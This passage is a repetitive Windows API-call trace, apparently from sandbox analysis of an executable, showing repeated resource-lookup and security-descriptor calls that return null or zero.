lpType=0x3) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.105] LockResource (hResData=0x0) returned 0x0 [0220.105] FreeResource (hResData=0x0) returned 0 [0220.105] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.105] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.105] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.105] LockResource (hResData=0x0) returned 0x0 [0220.105] FreeResource (hResData=0x0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.105] LockResource (hResData=0x0) returned 0x0 [0220.105] FreeResource (hResData=0x0) returned 0 [0220.105] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.105] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.105] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.105] LockResource (hResData=0x0) returned 0x0 [0220.105] FreeResource (hResData=0x0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.105] LockResource (hResData=0x0) returned 0x0 [0220.105] FreeResource (hResData=0x0) returned 0 [0220.105] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.105] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.105] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.105] LockResource (hResData=0x0) returned 0x0 [0220.105] FreeResource (hResData=0x0) returned 0 [0220.105] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.105] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.106] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.106] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.106] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.106] LockResource (hResData=0x0) returned 0x0 [0220.106] FreeResource (hResData=0x0) returned 0 [0220.106] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.107] FreeResource (hResData=0x0) returned 0 [0220.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.107] FreeResource (hResData=0x0) returned 0 [0220.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.107] FreeResource (hResData=0x0) returned 0 [0220.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.107] FreeResource (hResData=0x0) returned 0 [0220.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.107] FreeResource (hResData=0x0) returned 0 [0220.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.107] FreeResource (hResData=0x0) returned 0 [0220.107] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.107] FreeResource (hResData=0x0) returned 0 [0220.107] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.107] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.107] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.107] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.107] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.107] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.108] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.108] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.108] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.108] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.108] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.108] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.108] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.108] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.108] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.108] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.108] LockResource (hResData=0x0) returned 0x0 [0220.108] FreeResource (hResData=0x0) returned 0 [0220.108] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.108] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.108] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.109] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.109] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.109] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.109] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.109] LockResource (hResData=0x0) returned 0x0 [0220.109] FreeResource (hResData=0x0) returned 0 [0220.109] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.109] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.110] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.110] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.110] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.110] LockResource (hResData=0x0) returned 0x0 [0220.110] FreeResource (hResData=0x0) returned 0 [0220.110] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.111] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.111] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.111] GetPrivateObjectSecurity (in: ObjectDescriptor=0x209ddd8, SecurityInformation=0x0, ResultantDescriptor=0x209ddd8, DescriptorLength=0x0, ReturnLength=0x209ddd4 | out: ResultantDescriptor=0x209ddd8, ReturnLength=0x209ddd4) returned 0 [0220.111] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x209ddd8, pControl=0x209ddd0, lpdwRevision=0x209de4c | out: pControl=0x209ddd0, lpdwRevision=0x209de4c) returned 0 [0220.111] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.111] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0220.111] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0220.111] LockResource (hResData=0x0) returned 0x0 [0220.111] FreeResource (hResData=0x0) returned 0 [0220.112] GetPrivateObjectSecurity (in: 